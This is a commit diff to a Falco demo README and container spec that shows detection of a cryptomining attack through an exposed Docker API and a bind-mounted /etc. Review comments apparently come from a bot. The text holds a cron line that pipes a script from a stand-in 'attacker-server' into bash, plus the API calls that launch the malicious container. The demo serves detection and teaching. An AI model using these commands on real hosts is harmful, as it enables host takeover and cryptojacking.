Commit

Bug fixes.
mstemm committed Mar 15, 2018
1 parent e380185 commit 0e06675
Showing 2 changed files with 8 additions and 5 deletions.
11 changes: 7 additions & 4 deletions examples/bad-mount-cryptomining/README.md
@@ -1,4 +1,4 @@
#Demo of Falco Detecting Cryptomining Exploit
# Demo of Falco Detecting Cryptomining Exploit

## Introduction

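Review bot: The heading fix is correct; an ATX heading needs the space after `#`, so the old `#Demo ...` line rendered as literal text rather than as a title. No other issue in this hunk.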
Expand Down Expand Up @@ -53,12 +53,14 @@ falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco

To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you can do the same via `docker run -H http://localhost:2375 ...`.

The script `launch-malicious-container.sh` performs the necessary POSTs:
The script `launch_malicious_container.sh` performs the necessary POSTs:

* `http://localhost:2375/images/create?fromImage=alpine&tag=latest`
* `http://localhost:2375/containers/create?&name=docker123321-mysql`
* `http://localhost:2375/containers/docker123321-mysql/start`

Run the script via `bash launch_malicious_container.sh`.

### Examine cron output as malicious software is installed & run

`docker123321-mysql` writes the following line to `/etc/crontabs/root` on the host:
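Review bot: The rename to `launch_malicious_container.sh` makes the prose match the invocation `bash launch_malicious_container.sh` a few lines below, which is the right fix. While touching this paragraph, the untouched sentence above it has an unclosed parenthesis: `(although you can do the same via \`docker run -H http://localhost:2375 ...\`.` needs a closing `)` after the backtick; the create URL `containers/create?&name=docker123321-mysql` also carries a stray `&` directly after the `?`.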
Expand All @@ -67,7 +69,7 @@ The script `launch-malicious-container.sh` performs the necessary POSTs:
* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s
```

This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg)) from `attacker-server` and run it.
It also touches the file `/etc/crontabs/cron.update` to force cron to re-read its cron configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg)) from `attacker-server` and run it.

You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H http://localhost:2375 ps`. You should see output like the following:

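Review bot: The new sentence says the container "touches the file `/etc/crontabs/cron.update` to force cron to re-read its cron configuration", but the preceding sentence describes the crontab line as being written "on the host" via the `/etc:/mnt/etc` bind mount, and `/etc/crontabs/cron.update` without the `/mnt` prefix is the container's own `/etc`, not the host's. Say explicitly which filesystem the touch lands on; as written, a reader will assume it reaches the host's cron, and the Falco alert added in the next hunk (`file=/etc/crontabs/cron.update`) is what the reader will be asked to match against this description.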
Expand Down Expand Up @@ -102,11 +104,12 @@ host-machine_1 | runing.....

### Observe Falco detecting malicious activity

To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount:
To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount and the script's update of `/etc/crontabs/cron.update`:

```
falco_1 | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
falco_1 | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
falco_1 | 16:30:42.972199287: Error File below /etc opened for writing (user=root command=touch /etc/crontabs/cron.update parent=sh pcmdline=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /etc/crontabs/cron.update && sleep 300 file=/etc/crontabs/cron.update name=touch gparent=<NA> ggparent=<NA> gggparent=<NA>)
```

### Cleanup
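Review bot: The appended alert line is not from the same capture as the two above it: its timestamp is `16:30:42` versus `22:37:24`, and it carries none of the container context (`id=97587afcf89c`, `image=alpine:latest`) the other two lines show, while its `gparent=<NA> ggparent=<NA> gggparent=<NA>` fields suggest a different environment. Re-capture the three lines from one run so the sample output is coherent. In the sentence above the block, "the script's update of `/etc/crontabs/cron.update`" is also imprecise: the `touch` is performed by the container's `sh -c` command, not by `launch_malicious_container.sh`, which only issues the POSTs.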
@@ -1,5 +1,5 @@
{
"Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300"],
"Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /etc/crontabs/cron.update && sleep 300"],
"Image": "alpine:latest",
"HostConfig": {
"Binds": ["/etc:/mnt/etc"]
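Review bot: The two paths in the new `Cmd` are inconsistent: the crontab entry is appended to `/mnt/etc/crontabs/root`, i.e. the host's `/etc` through the `/etc:/mnt/etc` bind, while the added `touch /etc/crontabs/cron.update` hits the container's own `/etc`. The README text in this commit describes the touch as making cron reload the host crontab, so the command and the documentation disagree; reconcile the wording with what the command actually does. From the detection side this is worth stating plainly in the README: the touch inside the container's `/etc` is exactly what triggers the `File below /etc opened for writing` alert shown in the expected output, independent of the mount.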

0 comments on commit 0e06675